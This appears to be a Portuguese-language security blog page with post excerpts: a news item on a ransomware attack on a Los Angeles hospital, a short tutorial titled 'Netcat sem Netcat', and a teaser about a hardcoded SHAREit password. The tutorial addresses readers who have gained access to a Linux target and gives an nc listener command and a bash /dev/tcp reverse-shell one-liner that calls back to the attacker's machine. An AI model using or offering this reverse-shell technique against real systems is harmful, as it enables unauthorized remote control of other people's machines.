Ransomware Proof of Concept dando Bypass no antivírus do windows

3 milhões de dólares em bitcoins

Mais uma vez o vírus ransomware ganhou destaque nas manchetes. Dessa vez o alvo foi o hospital The Hollywood Presbyterian Medical Center localizado em Los Angeles, eles tiveram seus dados criptografados e agora não conseguem acessar dados importantes de seus pacientes. Para liberar a senha que será usada para descriptografar esses dados os hackers estão pedindo uma bagatela de 3 milhões de dólares como resgate. Apesar do estrago que esses ransomware vem causando, a prevenção é muito simples: NÃO CLIQUE NAQUILO QUE VOCÊ NÃO SABE A PROCEDÊNCIA !!!!

P.S: Grandes sites como CNBC e a afiliada da NBC em Los Angeles reportaram que o valor do resgate foi de 3.7 milhões de dólares, sites menores estão dizendo que o valor não passou de 17 mil dólares. O próprio hospital emitiu uma nota dizendo que o valor pago pelo resgate foi de 17 mil dólares. O valor real pago ninguém sabe, o hospital pode ter emitido essa nota com valor inferior até mesmo para não incentivar outros ataques.

Netcat sem Netcat no linux

Por acaso você já conseguiu acesso a uma máquina rodando linux e ai você tentou rodar o netcat para fazer um shell reverso, mas se deparou por exemplo com o fato de que a máquina alvo não tinha o netcat instalado ou de repente você tentou instala-lo mas por algum motivo ele não funcionou?
Bom como todos sabemos geralmente ambientes linux tem o netcat instalado por padrão, mas você pode acabar se deparando com alguma máquina que esteja rodando linux mas não tem o netcat instalado. Os motivos para tal podem ser os mais diversos possíveis. Bom independente de qualquer coisa não se preocupe, existe diversas maneiras de usarmos o netcat sem ter o netcat instalado na máquina alvo. Abaixo segue uma das maneiras com que podemos fazer isso.
Bom a primeira coisa que precisamos fazer é rodar o netcat na nossa máquina e coloca-lo em em listen mode ou modo de escuta, para isso utilizamos o seguinte comando:

nc -n -v -l -p porta-desejada

Agora na máquina alvo utilizamos o seguinte comando:

/bin/bash -i > /dev/tcp/ip-da-máquina-do-atacante/porta-na-qual-o-necat-está-ouvindo-na-máquina-do-atacante 0<&1

O camando acima vai fazer com que a máquina alvo se conecte na máquina do atacante. Vale lembrar que o comando acima pode não funcionar em todas as distribuições linux, caso isso ocorra se vire nos 30.

Não sabe quem é esse tal de netcat? Well google it.

Lenovo protege sua segurança com a senha “12345678” no ShareIt

O que você espera de um gigante da tecnologia para proteger a segurança do seu serviço SHAREit? com algum tipo de proteção correto?
Mas e se essa proteção for uma senha, e mais ainda, e se a senha for nada mais nada menos que “12345678” que vem hard-coded no software?

Leia mais